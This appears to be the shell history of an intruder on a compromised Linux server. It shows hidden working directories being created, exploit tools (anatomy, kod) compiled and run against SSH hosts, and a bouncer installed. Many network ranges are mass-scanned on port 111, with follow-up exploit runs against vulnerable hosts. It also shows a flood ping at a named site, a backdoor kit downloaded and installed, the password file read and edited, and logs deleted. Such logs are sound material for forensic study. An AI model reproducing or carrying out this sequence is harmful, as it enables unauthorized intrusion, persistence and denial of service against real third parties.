ls
mkdir.dead
mkdir .dead
cd .dead
cc anatomy.c -o anatomy
cc kod.c -o kofd
cp kofd kod
rm kofd
./anatomy 216.209.196.154 22
./anatomy 216.209.205.68 22
./anatomy 216.209.207.150 22
cd home
cd .dead
who
ls
tar -zxvf bnc2_6_4_tar.gz
cd bnc2.6.4
./configure
make
ls
make install
make
cd home
cd httpd
cd icons
cd small
cd .shit
mkdir small
cd small
mkdir .shit
cd .shit
who
chmod 777 *
chmod +s *
chmod 666 *
chmod 777 *
./pscan
./b
./pscan 167.64 111


./pscan 206.252 111
cat wuftp.lo
cat wuftp.log
./b 206.252.255.42
./pscan 198.138 111
cat wuftp.log
rm wuftp.log
./pscan 198.59 111
cat wuftp.log
./b 198.59.112.9
./b 198.59.115.35
./b 198.59.173.186
./b 198.59.169.11
exit
cd home
cd .dead
cd home
cd httopd
cd icons
cd httpd
cd iocns
cd icons
cd small
cd .shit
./b www.telesync.com
rm wuftp.log
./b www.cqhost.com
./pscan 195.54 111
cd home
cd httpd
cd icons
cd small
cd .shit
cat wuftp.log
./b 195.54.2.162
rm wuftp.log
./pscan 195.54
./pscan 195.54 111
cat wuftp.log
./b 195.54.3.134
./b 195.54.29.7
./b 195.54.221.21
rm wuftp.log
./b 206.132.34.52
./pscan 206.132 111
cat wuftp.log
./b 206.132.219.119
./b 206.132.219.170
rm wuftp.log
./pscan 209.0 111
cd home
cd .dead
cd ..
cd httpd
cd icons
cd small
cd .shit
cat wuftp.log
ping -f newsforlinux.com
cd home
cd httpd
cd icons
cd small
cd .shit
cd home
cd httpd
cd icons
cd small
cd .shit
./pscan 216.122 111
d home
cd home
cd httpd
cd icons
cd small
cd .shit
cat wuftp.log
./pscan 193.86 111
cat wuftp.log
rm wuftp.log
./b 143.232.55.1
./pscan 143.232 111
cd home
cd httpd
cd icons
cd small
cd .shit
./pscan 128.61 111
who
cd home
cd httpd
c dicons
cd small
cd .shit
cd icons
cd samll
cd .shit
cd small
cd .shit
./b 194.83.100.85
./pscan 194.83 111
cat wuftp.log
./b 203.15.123.146
./pscan 192.20 111
cd home
cd httpd
cd icons
cd small
cd ,.shit
cd .shit
./b e150.135.112.129
./b 150.135.112.129
d home
cd home
cd httpd
cd icons
cd small
cd shit
cd .shit
ls
cat wuftp.log
./b 139.78.100.200
./pscan 139.78 111
cd home
cd httpd
cd icons
cd small
cd .shit
who
exit
cd home
cd httpd
cd icons
cd small
cd .shit
who
cat wuftp.log
./b 216.156.219.216
./b 199.109.4.21
./pscan 199.109 111
./pscan 172.16 111
./pscan 192.55 111
cat wuftp.log
./b 192.55.203.135
rm wuftp.log
./pscan 129.98 111
./pscan 192.153 111
cat wuftp.log
./pscan 134.241 111
./b 142.169.8.215
cat wuftp.log
./pscan 204.116 111
cat wuftp.log
./b 204.116.30.166
./b 204.116.104.205
./b 204.116.202.5
rm wuftp.log
./pscan 192.203 111
cat wuftp.log
./b 192.203.80.149
./b 192.203.80.144
./b 192.203.80.142
./b 192.203.130.28
rm wuftp.log
./pscan 199.17 111
cat wuftp.log
./pscan 208.7 111
cat wuftp.log
./pscan 137.165 111
./pscan 209.56 111
cat wuftp.log
./pscan 204.185 111
cat wuftp.log
./b 204.185.56.250
./b 204.185.91.12
rm wuftp.log
./pscan 205.238 111
cat wuftp.log
./b 205.238.205.10
./b 205.238.238.112
rm wuftp.log
./pscan 156.26 111
cat wuftp.log
./b 156.26.120.34
rm wuftp.log
./pscan 206.243 111
cat wuftp.log
./pscan 192.204 111
cat wuftp.log
./pscan 140.211 111
cat wuftp.log
./pscan 192.207 111
cat wuftp.log
exit
ftp columbia.digiweb.com
tar -zxvf linux.tar.gz
cd .bd
./install
cd home
cd httpd
cd icons
cd msla
cd small
cd .shit
rm wuftp.log
./pscan 161.6 111
cat wuftp.log
./pscan 152.30 111
cat wuftp.log
./pscan 208.31 111
cat wuftp.log
./pscan 129.133 111
cat wuftp.log
./pscan 149.130 111
cat wuftp.log
./pscan 199.234 111
cat wuftp.log
./pscan 208.135 111
cat wuftp.log
./b 208.135.205.67
rm wuftp.log
./pscan 204.171 111
cat wuftp.log
./pscan 198.247 111
cat wuftp.log
./b 198.247.5.164
./pscan 199.199 111
cat wuftp.log
rm wuftp.log
./pscan 198.150 111
cat wuftp.log
./b 198.150.93.205
telnet 198.150.93.205
rm wuftp.log
./pscan 150.174 111
./pscan 208.27 111
cat wuftp.log
uname -a
cat /etc/passwd
pico /ec/passwd
cd /home
ls -a
cd ..
ls -a
car .bash_history
cat .bash_history
passwd z
cat /etc/passwd
cd home
cd httpd
cd icons
cd small
c d.shit
cd .shit
ls
cat wuftp.log
rm *.log
./pscan 155.42 111
uname -a
who
./anatomy 212.1.128.61 22
/home/.dead/anatomy 212.1.128.61 22
whoami
exit